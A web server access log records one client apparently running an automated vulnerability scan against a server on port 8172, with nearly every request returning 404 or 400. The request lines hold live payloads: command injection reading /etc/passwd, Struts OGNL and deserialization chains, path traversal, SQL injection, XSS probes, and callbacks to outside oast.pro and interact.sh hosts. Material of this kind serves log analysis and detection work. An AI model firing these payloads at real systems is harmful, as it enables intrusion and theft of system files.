2024-01-05 05:57:41 103.153.214.94 POST /apisix/admin/routes - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 9
2024-01-05 05:57:44 103.153.214.94 GET /2aVH1AStNDPI4fNB4q2FJyd75z4 cmd=id 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 6
2024-01-05 05:57:51 103.153.214.94 POST /lib/crud/userprocess.php - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 7
2024-01-05 05:57:54 103.153.214.94 GET /login.php - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 5
2024-01-05 05:57:57 103.153.214.94 POST /lib/crud/userprocess.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 6
2024-01-05 05:59:06 103.153.214.94 GET /user/login - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 14
2024-01-05 05:59:51 103.153.214.94 POST /console/css/%2e%2e%2fconsole.portal - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 400 0 0 14
2024-01-05 06:01:17 103.153.214.94 GET /console/images/%2e%2e%2fconsole.portal _nfpb=true&amp;_pageLabel&amp;handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(&#039;http://cmbglsthtacjkv124nvgipyjuk8579exq.oast.pro&#039;) 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 400 0 0 13
2024-01-05 06:01:47 103.153.214.94 POST /console/images/%2e%2e%2fconsole.portal - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 400 0 0 16
2024-01-05 06:03:54 103.153.214.94 GET / - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 8
2024-01-05 06:04:00 103.153.214.94 GET /index.php r=test/sss&amp;data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ== 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 7
2024-01-05 06:05:14 103.153.214.94 GET /nette.micro/ callback=shell_exec&amp;cmd=cat%20/etc/passwd&amp;what=-1 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 12
2024-01-05 06:06:16 103.153.214.94 GET / key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 9
2024-01-05 06:06:26 103.153.214.94 GET /analytics/saw.dll bieehome&amp;startPage=1 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 9
2024-01-05 06:06:29 103.153.214.94 GET /analytics/saw.dll getPreviewImage&amp;previewFilePath=/etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 5
2024-01-05 06:08:47 103.153.214.94 POST /mifs/.;/services/LogService - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 14
2024-01-05 06:10:32 103.153.214.94 GET /info.php RESULT=&quot;,msgArray);alert(document.domain);// 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 10
2024-01-05 06:10:45 103.153.214.94 POST /PDC/ajaxreq.php PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&amp;DIAGNOSIS=PING 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 11
2024-01-05 06:11:36 103.153.214.94 POST /run - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 8
2024-01-05 06:11:52 103.153.214.94 GET / s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 6
2024-01-05 06:12:05 103.153.214.94 GET /carbon/admin/login.jsp msgId=%27%3Balert(%27document.domain%27)%2F%2F 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 9
2024-01-05 06:14:32 103.153.214.94 GET /user/login - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 10
2024-01-05 06:15:21 103.153.214.94 POST /ajax/render/widget_tabbedcontainer_tab_panel - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 12
2024-01-05 06:16:13 103.153.214.94 GET /include/exportUser.php type=3&amp;cla=application&amp;func=_exec&amp;opt=(cat%20/etc/passwd)%3Eopid.txt 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 11
2024-01-05 06:16:16 103.153.214.94 GET /include/opid.txt - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 11
2024-01-05 06:17:26 103.153.214.94 GET /fw.login.php apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 12
2024-01-05 06:18:48 103.153.214.94 POST /cgi-bin/login.cgi - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 9
2024-01-05 06:18:51 103.153.214.94 POST /cgi-bin/system_log.cgi - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 12
2024-01-05 06:19:10 103.153.214.94 GET /jobmanager/logs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 400 0 0 12
2024-01-05 06:19:40 103.153.214.94 GET / id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 5
2024-01-05 06:20:35 103.153.214.94 GET /error msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 10
2024-01-05 06:21:40 103.153.214.94 GET /newVersion callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 8
2024-01-05 06:21:40 103.153.214.94 GET /weibo/topic/&lt;/script&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt; - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 400 0 0 13
2024-01-05 06:23:29 103.153.214.94 GET /fw.login.php apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 10
2024-01-05 06:23:32 103.153.214.94 GET /cyrus.index.php service-cmds-peform=%7C%7Cwhoami%7C%7C 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 5
2024-01-05 06:24:25 103.153.214.94 GET /fhem/FileLog_logWrapper dev=Logfile&amp;file=%2fetc%2fpasswd&amp;type=text 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 9
2024-01-05 06:24:33 103.153.214.94 POST /jars/upload - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 9
2024-01-05 06:24:36 103.153.214.94 GET /jobmanager/logs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fpoc - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 400 0 0 9
2024-01-05 06:25:54 103.153.214.94 GET /admin/ - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 10
2024-01-05 06:25:57 103.153.214.94 GET /admin/ - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 5
2024-01-05 06:26:05 103.153.214.94 GET /control/stream contentId=%27\%22%3E%3Csvg/onload=alert(/xss/)%3E 8172 - 203.205.9.60 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 6
2024-01-05 06:26:10 103.153.214.94 GET /install/index.php step=database_config&amp;db_error=&lt;img%20src=x%20onerror=alert(document.domain)%20/&gt; 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 5
2024-01-05 06:27:09 103.153.214.94 GET /fuel/login/ - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 9
2024-01-05 06:27:13 103.153.214.94 POST /fuel/login/ - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 6
2024-01-05 06:27:16 103.153.214.94 GET /fuel/pages/items/ search_term&amp;published&amp;layout&amp;limit=50&amp;view_type=list&amp;offset=0&amp;order=asc&amp;col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&amp;fuel_inline=0 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 7
2024-01-05 06:27:27 103.153.214.94 GET /user/login.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 xss&quot;/&gt;&lt;img+src=&quot;#&quot;+onerror=&quot;alert(document.domain)&quot;/&gt; 404 7 0 7
2024-01-05 06:27:27 103.153.214.94 GET /tests/support/stores/test_grid_filter.php query=echo%20md5%28%22CVE-2020-19625%22%29%3B 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 6
2024-01-05 06:27:59 103.153.214.94 GET /gitlab/build_now&lt;/script&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt; - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 400 0 0 14
2024-01-05 06:28:27 103.153.214.94 GET /passport/index.php action=manage&amp;mtype=userset&amp;backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 10
2024-01-05 06:30:49 103.153.214.94 POST /forgot_password.php - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 10
2024-01-05 06:31:45 103.153.214.94 POST /login - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 bcvt.kontum.gov.vn:8172/module/login/login.html 404 7 0 9
2024-01-05 06:35:01 103.153.214.94 GET /plus/ajax_street.php act=alphabet&amp;x=11%ef%bf%bd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9%20from%20qs_admin 8172 - 203.205.9.60 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 9
2024-01-05 06:35:33 103.153.214.94 GET /plus/ajax_common.php act=hotword&amp;query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 8
2024-01-05 06:35:58 103.153.214.94 GET /plus/ajax_officebuilding.php act=key&amp;key=%e9%8c%a6%27%20a&lt;&gt;nd%201=2%20un&lt;&gt;ion%20sel&lt;&gt;ect%201,2,3,md5(999999999),5,6,7,8,9%23 8172 - 203.205.9.60 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 7
2024-01-05 06:36:12 103.153.214.94 GET /plus/ajax_street.php act=key&amp;key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5(999999999),9%23 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 7
2024-01-05 06:36:59 103.153.214.94 GET /email_passthrough.php email_ID=1&amp;type=link&amp;email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&amp;redirect_to=http%3A%2F%2Finteract.sh 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 31
2024-01-05 06:37:08 103.153.214.94 GET / url=http://interact.sh 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 5
2024-01-05 06:37:26 103.153.214.94 GET /whoAmI/ - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 10
2024-01-05 06:37:30 103.153.214.94 GET /whoAmI/ - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 5
2024-01-05 06:39:32 103.153.214.94 GET /descriptorByName/AuditTrailPlugin/regexCheck value=*j%3Ch1%3Esample 8172 - 203.205.9.60 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 13
2024-01-05 06:39:35 103.153.214.94 GET /jenkins/descriptorByName/AuditTrailPlugin/regexCheck value=*j%3Ch1%3Esample 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 7
2024-01-05 06:41:37 103.153.214.94 GET /contact.php theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 19
2024-01-05 06:42:50 103.153.214.94 GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 8
2024-01-05 06:42:58 103.153.214.94 GET /find_v2/_click _t_id&amp;_t_q&amp;_t_hit.id&amp;_t_redirect=https://interact.sh 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 6
2024-01-05 06:44:48 103.153.214.94 GET /login/ uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 12
2024-01-05 06:44:53 103.153.214.94 GET / uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 15
2024-01-05 06:46:14 103.153.214.94 POST /carbon/generic/save_artifact_ajaxprocessor.jsp - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 10
2024-01-05 06:46:31 103.153.214.94 GET / p=1 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 6
2024-01-05 06:47:12 103.153.214.94 GET /ajax/apps/manifests action=all&amp;format=debug&amp;xss=&lt;script&gt;alert(document.domain);&lt;/script&gt; 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 8
2024-01-05 06:47:55 103.153.214.94 GET /index.php action=post&amp;order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 8
2024-01-05 06:47:57 103.153.214.94 POST /index.php option=com_gmapfp&amp;controller=editlieux&amp;tmpl=component&amp;task=upload_image 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 4
2024-01-05 06:48:00 103.153.214.94 POST /index.php option=comgmapfp&amp;controller=editlieux&amp;tmpl=component&amp;task=upload_image 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 4
2024-01-05 06:48:47 103.153.214.94 GET /CuteSoft_Client/CuteEditor/Template.aspx Referrer=XSS&quot;;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt; 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 9
2024-01-05 06:50:29 103.153.214.94 GET /infusions/downloads/downloads.php cat_id=${system(ls)} 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 10
2024-01-05 06:50:42 103.153.214.94 POST / - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 8
2024-01-05 06:50:43 103.153.214.94 GET /config/getuser index=0 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 6
2024-01-05 06:50:45 103.153.214.94 GET /cgi-bin/execute_cmd.cgi timestamp=1589333279490&amp;cmd=cat%20/etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 19
2024-01-05 06:51:23 103.153.214.94 POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 9
2024-01-05 06:51:24 103.153.214.94 GET /cgi-bin/manlist section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/2aVH1IvN8GK6RqMQDoHPQlw46hS/)%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 13
2024-01-05 06:51:27 103.153.214.94 POST /var - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 5
2024-01-05 06:52:18 103.153.214.94 GET /console/login/LoginForm.jsp - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 10
2024-01-05 06:55:16 103.153.214.94 GET /admin.html s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 9
2024-01-05 06:55:47 103.153.214.94 GET / - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 17
2024-01-05 06:55:49 103.153.214.94 POST /checkValid - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 6
2024-01-05 06:55:53 103.153.214.94 GET /public/css/2aVH1Dr22vlpsuT0QSbyYcSAHKI.css - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 7
